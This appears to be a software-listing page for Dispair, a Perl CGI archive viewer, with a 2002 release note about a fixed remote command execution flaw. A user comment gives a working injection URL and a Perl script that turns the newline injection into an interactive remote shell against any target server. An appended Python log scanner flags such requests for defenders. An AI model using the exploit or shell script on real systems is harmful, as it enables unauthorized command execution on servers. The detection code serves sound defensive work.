Dispair

Dispair (DISPlay Archives In Realtime) is a tiny CGI script written in Perl that lets users browse tar.gz archives.

Recent releases

  •  31 Jul 2002 23:29

    Release Notes: A remote command execution exploit was fixed.

    Recent comments

    30 Jul 2002 16:47 404

    remote command execution exploit
    http://target/cgi-bin/dispair.cgi?file=fiddle&view=%0A/usr/bin/id

    Here is a perl script that provides a shell-like interface:

    #!/usr/bin/perl

    use strict;
    use IO::Socket;

    my $target = shift || die "usage: $0 <targetserver>";
    my $cmd = '';

    while ($cmd ne 'exit') {
    print ">> "; $cmd = <STDIN>; chomp $cmd;
    $cmd =~ s/ /%20/g;
    my $socket = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 'http(80)', Proto => 'tcp');
    print $socket "GET /cgi-bin/dispair.cgi?file=fiddle&view=%0A$cmd HTTP/1.0\n";
    print $socket "Host: $target\n";
    print $socket "USER-AGENT: scriptkiddie\n\n";
    while (<$socket>) { last if ($_ =~ m/^\r/); }
    while (<$socket>) { print; }
    close $socket;
    }
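
A defender-side check for the request pattern in the comment above, as an added example that is not part of the original page or the Dispair project: it scans web server access logs for requests to dispair.cgi whose query parameters decode to control characters such as the %0A newline. The log lines, the Common Log Format layout and the function name are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Common Log Format), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [30/Jul/2002:16:50:01 +0000] "GET /cgi-bin/dispair.cgi?file=fiddle&view=README HTTP/1.0" 200 512
192.0.2.66 - - [30/Jul/2002:16:51:12 +0000] "GET /cgi-bin/dispair.cgi?file=fiddle&view=%0A/usr/bin/id HTTP/1.0" 200 87
192.0.2.66 - - [30/Jul/2002:16:51:40 +0000] "GET /cgi-bin/dispair.cgi?file=fiddle&view=%0a/bin/ls%20-l HTTP/1.0" 200 230
192.0.2.11 - - [30/Jul/2002:16:52:03 +0000] "GET /index.html?note=a%0Ab HTTP/1.0" 200 1024
"""

# Client address and request target from one Common Log Format line.
REQUEST_RE = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)
# Any ASCII control character; a decoded %0A (newline) is the case on this page.
CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")


def suspicious_requests(log_text, script="dispair.cgi"):
    """Return (line_no, client, param, decoded_value) for each request to
    `script` whose query parameter decodes to a control character."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/" + script):
            continue  # only the CGI script under review
        # parse_qsl percent-decodes values, so %0A and %0a both become "\n".
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            if CONTROL_CHARS.search(value):
                hits.append((lineno, m.group("client"), name, value))
    return hits


if __name__ == "__main__":
    for lineno, client, name, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {lineno}: {client} sent control characters in {name}={value!r}")
```

Matching on the decoded value rather than the raw string catches both `%0A` and `%0a`, and hits on a host still running a release older than the 31 Jul 2002 fix are worth reviewing.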
